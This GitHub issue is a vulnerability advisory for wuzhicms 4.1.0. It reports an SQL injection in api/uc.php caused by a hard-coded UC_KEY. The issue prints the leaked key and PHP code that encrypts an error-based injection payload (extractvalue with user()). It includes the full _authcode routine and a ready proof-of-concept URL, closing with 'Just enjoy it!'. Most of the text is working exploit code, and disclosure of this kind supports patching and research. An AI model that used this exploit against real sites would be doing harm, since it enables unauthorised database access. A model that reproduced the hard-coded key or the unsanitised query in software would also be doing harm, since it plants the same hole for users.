Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

wuzhicms api/uc.php SQL Injection Vulnerability #141

Open
unh3x opened this issue Jun 4, 2018 · 0 comments
Open

wuzhicms api/uc.php SQL Injection Vulnerability #141

unh3x opened this issue Jun 4, 2018 · 0 comments

Comments

@unh3x
Copy link

unh3x commented Jun 4, 2018

wuzhicms api/uc.php SQL Injection Vulnerability

==========================
Advisory: wuzhicms api/uc.php SQL Injection Vulnerability
Author: snake.jin@DBAppSecurity
Affected Version: Latest 4.1.0
Vulnerability Description
Recetly, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard coded 'UC_KEY'.

Vulnerable cgi: /api/uc.php

<?php 
$code = isset($GLOBALS['code']) ? $GLOBALS['code'] : '';
$get = $GLOBALS;
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);

if(MAGIC_QUOTES_GPC) $get = _stripslashes($get);
...

if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
	$uc_note = new uc_note();
	header('Content-type: text/html; charset='.CHARSET);
	$action = $get['action'];
	echo $uc_note->$action($get, $post);
	exit();
} else {
	exit(API_RETURN_FAILED);
}

...

    function synlogin($get, $post) {
		header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
		$username = $get['username'];
		$r = $this->member->db->get_one('member', 'username="'.$username.'"');
        
		if($r){
			$cookietime = COOKIE_TTL ? SYS_TIME.COOKIE_TTL : 0;
			set_cookie('auth', encode($r['uid']."\t".$r['password']."\t".$cookietime, substr(md5(_KEY), 8, 8)), $cookietime);
			set_cookie('_uid', $r['uid'], $cookietime);
			set_cookie('_username', $r['username'], $cookietime);
			set_cookie('_groupid', $r['groupid'], $cookietime);
		}
		return API_RETURN_SUCCEED;
	}
?>

As the code above, if we know the UC_KEY, we can decode all the $get parameters, and the 'username' parameter causes a sql injection.
Fortunately in the latest version the UC_KEY is hard coded as 'uc_key' => 'e063rbkHX22RAvIg'.

So we can use the code below to calculate the 'code' value:

$a = 'time='.time().'&action=synlogin&username=aa" and extractvalue(1,concat(0x7e,user()))#';
$code1 = urlencode(_authcode($a, 'ENCODE', 'e063rbkHX22RAvIg'));
var_dump($code1);exit;


function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
	$ckey_length = 4;

	$key = md5($key ? $key : UC_KEY);
	$keya = md5(substr($key, 0, 16));
	$keyb = md5(substr($key, 16, 16));
	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

	$cryptkey = $keya.md5($keya.$keyc);
	$key_length = strlen($cryptkey);

	$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
	$string_length = strlen($string);

	$result = '';
	$box = range(0, 255);

	$rndkey = array();
	for($i = 0; $i <= 255; $i++) {
		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
	}

	for($j = $i = 0; $i < 256; $i++) {
		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
		$tmp = $box[$i];
		$box[$i] = $box[$j];
		$box[$j] = $tmp;
	}

	for($a = $j = $i = 0; $i < $string_length; $i++) {
		$a = ($a + 1) % 256;
		$j = ($j + $box[$a]) % 256;
		$tmp = $box[$a];
		$box[$a] = $box[$j];
		$box[$j] = $tmp;
		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
	}

	if($operation == 'DECODE') {
		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
			return substr($result, 26);
		} else {
				return '';
			}
	} else {
		return $keyc.str_replace('=', '', base64_encode($result));
	}

}

==========================
POC && EXP

http://192.168.11.1/api/uc.php?code=50cbKM2US%2FRwJ7t%2FOIC6bRKnZEAAWvXoYeOnjmkm1lK%2F97owQgkczkqOAN4mvz%2B8VHyLhJL786q1%2FOrPS0bEbkhFBO9ugWAYjf4XLWIL9m2gPxqtBAp%2BvqOvbpnJP%2Fkal8sCBQDoqcZeS6KY2%2BDsu7LW

//Notice: parameter 'code' value depends on the web server time.

image

Just enjoy it!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant